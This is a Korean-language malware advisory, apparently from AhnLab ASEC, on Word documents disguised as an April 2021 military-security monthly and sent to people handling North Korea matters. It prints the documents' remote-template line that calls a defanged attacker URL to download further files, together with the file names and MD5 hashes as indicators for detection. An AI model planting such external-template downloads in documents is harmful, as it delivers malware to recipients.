대북 관련 악성 워드문서, 이번엔 군사안보 월간지로 위장
ASEC은 지난 3월말, 대북 관련 내용을 포함하고 있는 악성 워드(DOC) 문서를 공개했다. 해당 유형의 공격은 문서 내부 XML 파일에 작성된 ‘외부 External 연결 주소’로 접속해 추가 파일을 다운로드 받는 구조이다.
최근 해당 방식을 이용한 악성 워드 문서가 군사안보 월간지(4월호)를 위장해 유포 중인 것으로 포착되어, 이를 소개하고자 한다.
참고: 이메일로 유포되는 대북 관련 악성 워드 문서 주의!
군사안보 월간지(4월호)를 위장해 유포 중인 악성 워드 문서의 파일명은 아래와 같다.
- 월간KIMA2021_4월호군사안보0330.docx
- 월간KIMA2021_4월호군사안보0331.docx
문서 파일은 실행 시 본문 내용이 보호되어 있는 상태이며, 보호 해제 시 다음과 같은 본문 내용을 확인할 수 있다.
[그림 1] 월간지를 위장한 본문 내용(1)
[그림 2] 월간지를 위장한 본문 내용(2)
해당 문서에서 접속하는 악성 External 주소는 다음과 같다.
- Target=”hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6″ TargetMode=”External”/>
확인된 2개의 워드 문서의 속성에서 확인되는 수정한 날짜와 만든이에 관한 정보는 아래와 같다.
[그림 3] 수정한 날짜와 만든이 정보
그리고, 실제 정상적으로 배포된 문서는 아래 그림과 같이 PDF 형태로 제공되고 있다.
[그림 4] PDF 형식으로 유포 중인 정상 문서 – 링크
앞서 밝혔듯, 최근 대북 관련 내용을 포함한 악성 워드 문서가 다수 유포 중이며, 북한 관련 업무를 수행하는 수신자에게 보내졌을 가능성이 매우 크다. 스팸 메일을 통한 사회공학적 기법의 공격이 증가하고 있는 만큼 사용자들은 이러한 공격에 피해를 입지 않도록 주의를 기울여야 한다.
현재 V3 제품에서는 해당 파일에 대해 아래와 같이 진단하고 있다.
[파일 진단]
Downloader/DOC.External (2021.04.03.00)
[IOC]
월간KIMA2021_4월호군사안보0331.docx (md5: fe4dd316363d3631c83c2995dd3775f4)
월간KIMA2021_4월호군사안보0330.docx (md5: 609c2473571bf703ce985b6e44b8e343)
hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6
출처 : AhnLab